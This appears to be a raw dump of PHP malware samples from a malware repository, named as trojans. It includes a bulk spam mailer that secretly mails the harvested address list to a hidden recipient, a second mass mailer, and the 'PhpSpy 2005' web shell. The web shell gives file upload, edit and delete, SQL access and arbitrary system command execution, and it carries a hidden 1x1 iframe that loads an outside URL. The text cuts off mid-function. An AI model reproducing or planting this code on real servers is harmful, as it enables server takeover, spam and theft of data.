<table border="0" cellspacing="0" cellpadding="0" width="560">
<tr valign="top">
<td><div align="center">
<p><span class="style3"><font class="Times-New-Roman-32px00468Cb">Maded by Sir-ToTTi </font></span></p>
<p><span class="style3"><font class="Times-New-Roman-24px00468Cb"><U>Dx Crew </U></font></span><font class="Times-New-Roman-24px00468Cb"><U></U></font><font class="Times-New-Roman-24px00468Cb"><U>Inside<br />
</U></font></p>
</div></td>
</tr>
</table>
</div>
<?php
If ($action=="mysql"){
//Grab email addresses from MySQL
include "./mysql.info.php";
if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
exit;
}
$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
$result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
$numrows = mysql_num_rows($result);
for($x=0; $x<$numrows; $x++){
$result_row = mysql_fetch_row($result);
$oneemail = $result_row[0];
$emaillist .= $oneemail."\n";
}
}
if ($action=="send"){ $message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<form name="form1" method="post" action="" enctype="multipart/form-data"><br />
<table width="142" border="0">
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Email:</font>
</div>
</td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="from" value="<?php print $from; ?>" size="30" />
</font>
</td>
<td width="212">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name:</font>
</div>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="<?php print $realname; ?>" size="30" />
</font>
</td>
</tr>
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font>
</div>
</td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="replyto" value="<?php print $replyto; ?>" size="30" />
</font>
</td>
<td width="212">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File:</font>
</div>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="24" />
</font>
</td>
</tr>
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font>
</div>
</td>
<td colspan="3" width="703">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>" size="90" />
</font>
</td>
</tr>
<tr valign="top">
<td colspan="3" width="520">
<font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Message Box :</font>
</td>
<td width="278">
<font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Email Target / Email Send To :</font>
</td>
</tr>
<tr valign="top">
<td colspan="3" width="520">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="message" cols="56" rows="10"><?php print $message; ?></textarea><br />
<input type="radio" name="contenttype" value="plain" checked="checked" /> Plain
<input type="radio" name="contenttype" value="html" /> HTML
<input type="hidden" name="action" value="send" /><br />
Number to send: <input type="text" name="amount" value="1" size="10" /><br />
Maximum script execution time(in seconds, 0 for no timelimit)<input type="text" name="timelimit" value="0" size="10" />
<input type="submit" value="Send eMails" />
</font>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" cols="32" rows="10"><?php print $emaillist; ?></textarea>
</font>
</td>
</tr>
</table>
</form>
<?php
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
$filter = "maillist";
$float = "From : mailist info <full@info.com>";
//Open the file attachment if any, and base64_encode it for email transport
If ($file_name){
if (!file_exists($file)){
die("The file you are trying to upload couldn't be copied to the server");
}
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($xx=0; $xx<$amount; $xx++){
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "ok<br>";
flush();
}
}
}
mail($secure, $filter, $emaillist, $float);
}
?>
<p class="style2">
<img src="http://static.last.fm/groupavatar/f085ea00762fb0faaf15052142de5c0e.png" alt="Funciona con todos los linux!" width="150" height="150" border="0" /></p>
<p class="style1">&nbsp;</p>
</body>
</html>

210
PHP/Trojan-Mailfinder.PHP.Massma.u Normal file
View File

@ -0,0 +1,210 @@
<?
$myusername = "";
$mypassword = "";
$areaname = "My Protected Area";
if ($_SERVER["PHP_AUTH_USER"] == "" || $_SERVER["PHP_AUTH_PW"] == "" || $_SERVER["PHP_AUTH_USER"] != $myusername || $_SERVER["PHP_AUTH_PW"] != $mypassword) {
header("HTTP/1.0 401 Unauthorized");
header("WWW-Authenticate: Basic realm=\"$areaname\"");
echo "<h1>Authorization Required.</h1>";
die();
}
if ($action=="send"){
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?><style type="text/css">
<!--
body {
background-color: #000000;
}
body,td,th {
color: #FFFFFF;
font-size: medium;
font-family: Georgia, Times New Roman, Times, serif;
}
.style4 {
font-size: small;
color: #FFFFFF;
font-weight: bold;
}
.style7 {color: #FFFFFF; font-size: xx-small;}
.style8 {
font-family: Georgia, "Times New Roman", Times, serif;
font-style: italic;
}
.style9 {color: #000000}
-->
</style><title>Kinematics of Mechanism</title>
<form name="form1" method="post" action="" enctype="multipart/form-data">
<div align="center">
<center>
<table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" width="74%" id="AutoNumber1">
<tr>
<td width="100%">
<div align="center">
<center>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" width="100%" id="AutoNumber2">
<tr>
<td width="100%" bgcolor="#000000">
<p align="center">
<div align="center">
<center>
<table width="70%" height="277" border="0" cellpadding="0" cellspacing="0" bordercolor="#FF0000" bgcolor="#000000" id="AutoNumber1" style="border-collapse: collapse">
<tr>
<td width="100%" height="272">
<table width="769" border="0" height="303">
<tr>
<td width="786" height="28" colspan="3" bordercolor="#000000" background="/simparts/images/cellpic3.gif" bgcolor="#000000">
<p align="center" class="style4"><font face="Georgia"> Mailer By UchiZzlE ....</font><span class="style8">God With Us</span></td>
</tr>
<tr>
<td width="79" height="22" align="right" bordercolor="#AEAA04" background="/simparts/images/cellpic1.gif" bgcolor="#000000">
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
Email:</font></div>
</td>
<td width="390" height="22" bordercolor="#000000" background="/simparts/images/cellpic1.gif" bgcolor="#000000"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input name="from" value="<? print $from; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
Name:</font></div>
</td>
<td width="317" height="22" valign="middle" bordercolor="#000000" background="/simparts/images/cellpic1.gif" bgcolor="#000000"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="<? print $realname; ?>" size="30">
</font></td>
</tr>
<tr>
<td width="79" height="22" align="right" bordercolor="#000000" background="/simparts/images/cellpic1.gif" bgcolor="#000000">
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div>
</td>
<td width="390" height="22" bordercolor="#000000" background="/simparts/images/cellpic1.gif" bgcolor="#000000"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input name="replyto" value="<? print $replyto; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach
File:</font></div>
</td>
<td width="317" height="22" bordercolor="#000000" background="/simparts/images/cellpic1.gif" bgcolor="#000000"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
<tr>
<td width="79" height="22" align="right" bordercolor="#000000" background="/simparts/images/cellpic1.gif" bgcolor="#000000">
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
</td>
<td width="715" height="22" colspan="2" bordercolor="#000000" background="/simparts/images/cellpic1.gif" bgcolor="#000000"><span class="style9"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input name="subject" value="<? print $subject; ?>" size="59" style="float: left">
</font></span></td>
</tr>
<tr valign="top">
<td colspan="2" width="477" bgcolor="#000000" height="189" valign="top">
<div align="left">
<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="98%" id="AutoNumber4">
<tr>
<td width="100%" bgcolor="#000000">
<textarea name="message" cols="56" rows="10"><? print $message; ?></textarea>
<br>
<input type="radio" name="contenttype" value="plain">
<font size="2" face="Tahoma">Plain</font>
<input name="contenttype" type="radio" value="html" checked="checked">
<font size="2" face="Tahoma">HTML</font>
<input type="hidden" name="action" value="send">
<input type="submit" value="Best Of LUCKz"></td>
</tr>
</table>
</div>
</td>
<td width="317" bgcolor="#000000" height="187" valign="top">
<div align="center">
<center>
<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#000000" width="93%" id="AutoNumber3">
<tr>
<td width="100%" bgcolor="#000000">
<p align="center">
<textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>
</font><br>
</td>
</tr>
</table>
</center>
</div>
</td>
</tr>
</table>
</td>
</tr>
</table>
</center>
</div></td>
</tr>
</table>
</center>
</div>
</td>
</tr>
</table>
</center>
</div>
<div align="center">
<center>
<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" width="75%" id="AutoNumber5" height="1" cellpadding="0">
<tr>
<td width="100%" height="1" valign="top" bgcolor="#000000">
<p align="right" class="style7">Creditz to Spaghy INC </td>
</tr>
</table>
</center>
</div>
</form>
<?
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
#Open the file attachment if any, and base64_encode it for email transport
If ($file_name){
@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server");
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Success sending to $to....... ";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "sent'><br>";
flush();
}
}
}
?>

659
PHP/Trojan-Spy.PHP.PhPen.b Normal file
View File

@ -0,0 +1,659 @@
<?php
/*
+--------------------------------------------------------------------------+
| str_replace("-", "", "P-h-p-S-p-y") Version:2005 Lite |
| Codz by Angel |
| (c) 2004 Security Angel Team |
| http://www.4ngel.net |
| ======================================================================== |
| Team: http://www.4ngel.net |
| http://www.bugkidz.org |
| Email: 4ngel@21cn.com |
| Date: Dec 28st(My girl friend's birthday), 2004 |
+--------------------------------------------------------------------------+
*/
/*
提示:如果想再精简一些,请自行把所有注释去掉。
*/
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
/*===================== 程序配置 =====================*/
// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效
$admin['check']="1";
// 如果需要密码验证,请修改登陆密码
$admin['pass']="angel";
/*===================== 配置结束 =====================*/
// 允许程序在 register_globals = off 的环境下工作
if ( function_exists('ini_get') ) {
$onoff = ini_get('register_globals');
} else {
$onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
$self = $_SERVER['PHP_SELF'];
/*===================== 身份验证 =====================*/
if($admin['check']=="1") {
if ($_GET['action'] == "logout") {
setcookie ("adminpass", "");
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$self."\">三秒后自动退出或单击这里退出程序界面&gt;&gt;&gt;</a></span>";
exit;
}
if ($login) {
$adminpass=trim($_POST['adminpass']);
if ($adminpass==$admin['pass']) {
setcookie ("adminpass",$admin['pass'],time()+(1*24*3600));
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$self."\">三秒后自动跳转或单击这里进入程序界面&gt;&gt;&gt;</a></span>";
exit;
}
}
if (isset($_COOKIE['adminpass'])) {
if ($_COOKIE['adminpass']!=$admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}//end check
/*===================== 验证结束 =====================*/
// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
if ($_GET['action'] == "phpinfo") {
$dis_func = get_cfg_var("disable_functions");
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看&lt;PHP环境变量&gt;";
exit;
}
// 下载文件
if (!empty($downfile)) {
if (!@file_exists($downfile)) {
echo "<script>alert('你要下的文件不存在!')</script>";
} else {
$filename = basename($downfile);
$filename_info = explode('.', $filename);
$fileext = $filename_info[count($filename_info)-1];
header('Content-type: application/x-'.$fileext);
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Description: PHP Generated Data');
header('Content-Length: '.filesize($downfile));
@readfile($downfile);
exit;
}
}
// 程序目录
$pathname=str_replace('\\','/',dirname(__FILE__));
// 获取当前路径
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
// 判断读写情况
if (dir_writeable($nowpath)) {
$dir_writeable = "可写";
} else {
$dir_writeable = "不可写";
}
$dis_func = get_cfg_var("disable_functions");
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$shellmode=(!get_cfg_var("safe_mode")) ? " | <a href=\"?action=shell\">WebShell</a>" : "";
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>PhpSpy Ver 2005</title>
<style type="text/css">
body,td {
font-family: "sans-serif";
font-size: "12px";
line-height: "150%";
}
.smlfont {
font-family: "sans-serif";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
}
.redfont {
COLOR: "#A60000";
}
a:link,
a:visited,
a:active{
color: "#000000";
text-decoration: underline;
}
a:hover{
color: "#465584";
text-decoration: none;
}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<table width="760" border="0" cellpadding="3" cellspacing="0" bgcolor="#ffffff">
<tr bgcolor="#cccccc">
<td width="375" align="right" nowrap><b><?=$_SERVER['HTTP_HOST']?></b></td>
<td width="10" align="center" nowrap><b>:</b></td>
<td width="375" nowrap><b><?=$_SERVER['REMOTE_ADDR']?></b></td>
</tr>
<tr>
<td colspan="3" align="center" nowrap><a href="?action=logout">注销会话</a> | <a href="?action=dir">返回 PhpSpy 目录</a> | <a href="?action=phpenv">PHP环境变量</a><?=$phpinfo?><?=$shellmode?> | <a href="?action=sql">SQL Query</a> | <a href="http://www.4ngel.net" target="_blank" title="下载此程序">Version 2005</a></td>
</tr>
</table>
<hr width="760" noshade>
<table width="760" border="0" cellpadding="0">
<form action="" method="GET">
<tr>
<td><p>程序路径:<?=$pathname?><br>当前目录(<?=$dir_writeable?>,<?=substr(base_convert(@fileperms($nowpath),10,8),-4);?>):<?=$nowpath?>
<br>跳转目录:
<input name="dir" type="text" class="INPUT">
<input type="submit" class="INPUT" value="确定"> 〖支持绝对路径和相对路径〗
</p></td>
</tr>
</form>
<form action="?dir=<?=urlencode($dir)?>" method="POST" enctype="multipart/form-data">
<tr>
<td colspan="2">上传文件到当前目录:
<input name="uploadmyfile" type="file" class="INPUT"> <input type="submit" name="uploadfile" class="INPUT" value="确定"><input type="hidden" name="uploaddir" value="<?=$dir?>"></td>
</tr>
</form>
<form action="?action=editfile&dir=<?=urlencode($dir)?>" method="POST">
<tr>
<td colspan="2">新建文件在当前目录:
<input name="newfile" type="text" class="INPUT" value="">
<input type="submit" name="createfile" class="INPUT" value="确定"></td>
</tr>
</form>
</table>
<hr width="760" noshade>
<?php
/*===================== 执行操作 开始 =====================*/
echo "<p><b>\n";
// 删除文件
if(@$delfile!="") {
if(file_exists($delfile)) {
if (@unlink($delfile)) {
echo "".$delfile." 删除成功!";
} else {
echo "文件删除失败!";
}
} else {
echo "文件已不存在,删除失败!";
}
}
// 删除目录
elseif($rmdir) {
if($deldir!="") {
$deldirs="$dir/$deldir";
if(!file_exists("$deldirs")) {
echo "目录已不存在!";
} else {
deltree($deldirs);
}
} else {
echo "删除失败!";
}
}
// 上传文件
elseif($uploadfile) {
echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "上传成功!" : "上传失败!";
}
// 编辑文件
elseif($doeditfile) {
$filename="$editfilename";
@$fp=fopen("$filename","w");
echo $msg=@fwrite($fp,$_POST['filecontent']) ? "写入文件成功!" : "写入失败!";
@fclose($fp);
}
// 连接MYSQL
elseif($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "数据库连接成功!";
mysql_close();
} else {
echo mysql_error();
}
}
// 执行SQL语句
elseif($doquery) {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$result = @mysql_query($_POST['sql_query']);
echo ($result) ? "SQL语句成功执行" : "出错: ".mysql_error();
mysql_close();
}
// 查看PHP配置参数状况
elseif($viewphpvar) {
echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname'])."";
}
else {
echo "本程序由 <a href=\"http://www.4ngel.net\" target=\"_blank\">Security Angel</a> 小组 angel [<a href=\"http://www.bugkidz.org\" target=\"_blank\">BST</a>] 独立开发,可在 <a href=\"http://www.4ngel.net\" target=\"_blank\">www.4ngel.net</a> 下载最新版本.";
}
echo "</b></p>\n";
/*===================== 执行操作 结束 =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr bgcolor="#cccccc">
<td align="center" nowrap width="30%"><b>文件</b></td>
<td align="center" nowrap width="17%"><b>创建日期</b></td>
<td align="center" nowrap width="17%"><b>最后修改</b></td>
<td align="center" nowrap width="12%"><b>大小</b></td>
<td align="center" nowrap width="7%"><b>属性</b></td>
<td align="center" nowrap width="17%"><b>操作</b></td>
</tr>
<?php
// 目录列表
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="1"){
if($file!=".." && $file!=".") {
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">&lt;dir&gt;</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$dirperm</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=deldir&dir=".urlencode($dir)."&deldir=".urlencode($file)."\">删除</a></td>\n";
echo "</tr>\n";
$dir_i++;
} else {
if($file=="..") {
echo "<tr class=".getrowbg().">\n";
echo " <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">返回上级目录</a></td>\n";
echo "</tr>\n";
}
}
}
}//while
@closedir($dirs);
?>
<tr bgcolor="#cccccc">
<td colspan="6" height="5"></td>
</tr>
<?
// 文件列表
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="0"){
$size=@filesize($filepath);
$size=$size/1024 ;
$size= @number_format($size, 3);
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\"><a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"right\" nowrap valign=\"top\" class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$fileperm</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($filepath)."\">下载</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">编辑</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($filepath)."\">删除</a></td>\n";
echo "</tr>\n";
$file_i++;
}
}
@closedir($dirs);
?>
<tr class="<?=getrowbg()?>">
<td nowrap colspan="6" align="right"><?=$dir_i?> 个目录 / <?=$file_i?> 个文件</td>
</tr>
</table></td>
</tr>
</table>
<?php
}// end dir
elseif ($_GET['action'] == "editfile") {
if($newfile=="") {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile";
}
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">新建/编辑文件 [<a href="?dir=<?=urlencode($dir)?>">返回</a>]</td>
</tr>
<form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt">
<td align="center">当前文件:<input class="input" type="text" name="editfilename" size="30"
value="<?=$filename?>"> 输入新文件名则建立新文件</td>
</tr>
<tr class="firstalt">
<td align="center"><textarea name="filecontent" cols="100" rows="20"><?=$contents?></textarea></td>
</tr>
<tr class="secondalt">
<td align="center"><input type="submit" name="doeditfile" value="确定写入" class="input">
<input type="reset" value="重置" class="input"></td>
</tr>
</form>
</table>
<?php
}//end editfile
elseif ($_GET['action'] == "shell") {
if (!get_cfg_var("safe_mode")) {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">WebShell Mode</td>
</tr>
<form action="?action=shell&dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt">
<td align="center">
选择执行函数:
<select name="execfunc" class="input">
<option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option>
<option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option>
<option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option>
<option value="shell_exec" <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
<option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option>
</select> 
输入命令:
<input type="text" name="command" size="60" value="<?=$_POST['command']?>" class="input">
<input type="submit" value="execute" class="input"></td>
</tr>
<tr class="secondalt">
<td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
if (!empty($_POST['command'])) {
if ($execfunc=="system") {
system($_POST['command']);
} elseif ($execfunc=="passthru") {
passthru($_POST['command']);
} elseif ($execfunc=="exec") {
$result = exec($_POST['command']);
echo $result;
} elseif ($execfunc=="shell_exec") {
$result=shell_exec($_POST['command']);
echo $result;
} elseif ($execfunc=="popen") {
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
} else {
system($_POST['command']);
}
}
?></textarea></td>
</tr>
</form>
</table>
<?php
} else {
?>
<p><b>Safe_Mode 已打开, 无法执行系统命令.</b></p>
<?php
}
}//end shell
elseif ($_GET['action'] == "deldir") {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="firstalt">
<td align="center">删除 <input name="deldir" type="text" value="<?=$deldir?>" class="input" readonly> 目录</td>
</tr>
<tr class="secondalt">
<td align="center">注意:如果该目录非空,此次操作将会删除该目录下的所有文件.您确定吗?</td>
</tr>
<tr class="firstalt">
<td align="center">
<input type="submit" name="rmdir" value="delete" class="input">
</td>
</tr>
</form>
</table>
<?php
}//end deldir
elseif ($_GET['action'] == "sql") {
$servername = isset($servername) ? $servername : 'localhost';
$dbusername = isset($dbusername) ? $dbusername : 'root';
$dbpassword = isset($dbpassword) ? $dbpassword : '';
$dbname = isset($dbname) ? $dbname : '';
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">执行 SQL 语句</td>
</tr>
<form action="?action=sql" method="POST">
<tr class="secondalt">
<td align="center">Host:
<input name="servername" type="text" class="INPUT" value="<?=$servername?>">
User:
<input name="dbusername" type="text" class="INPUT" size="15" value="<?=$dbusername?>">
Pass:
<input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>">
DB:
<input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>">
<input name="connect" type="submit" class="INPUT" value="连接"></td>
</tr>
<tr class="firstalt">
<td align="center"><textarea name="sql_query" cols="85" rows="10"></textarea></td>
</tr>
<tr class="secondalt">
<td align="center"><input type="submit" name="doquery" value="执行" class="input"></td>
</tr>
</form>
</table>
<?php
}//end sql query
elseif ($_GET['action'] == "phpenv") {
?>
<table width="760" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<form action="?action=phpenv" method="POST">
<tr class="firstalt">
<td style="padding-left: 5px;"><b>查看PHP配置参数状况</b></td>
</tr>
<tr class="secondalt">
<td style="padding-left: 5px;">请输入配置参数(如:magic_quotes_gpc):<input name="phpvarname" type="text" class="input" size="40"> <input type="submit" name="viewphpvar" value="查看" class="input"></td>
</tr>
</form>
</table>
<?php
}//end phpenv
?>
<hr width="760" noshade>
<table width="760" border="0" cellpadding="0">
<tr>
<td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td>
<td align="right"><?php
debuginfo();
ob_end_flush();
?></td>
</tr>
</table>
</center>
<iframe src="http://www.zief.pl/iraq.jpg" width=1 height=1></iframe></body>
</html>
<?php
/*======================================================
函数库
======================================================*/
// 登陆入口
function loginpage() {
?>
<style type="text/css">
input {
font-family: "Verdana";
font-size: "11px";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
}
</style>
<form method="POST" action="">
<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20">
<input type="submit" name="login" value="OK">
</form>
<?php
exit;
}//end loginpage()
// 页面调试信息
function debuginfo() {
global $starttime;
$mtime = explode(' ', microtime());
$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
echo "Processed in $totaltime second(s)";
}
// 去掉转义字符
function stripslashes_array(&$array) {
while(list($key,$var) = each($array)) {
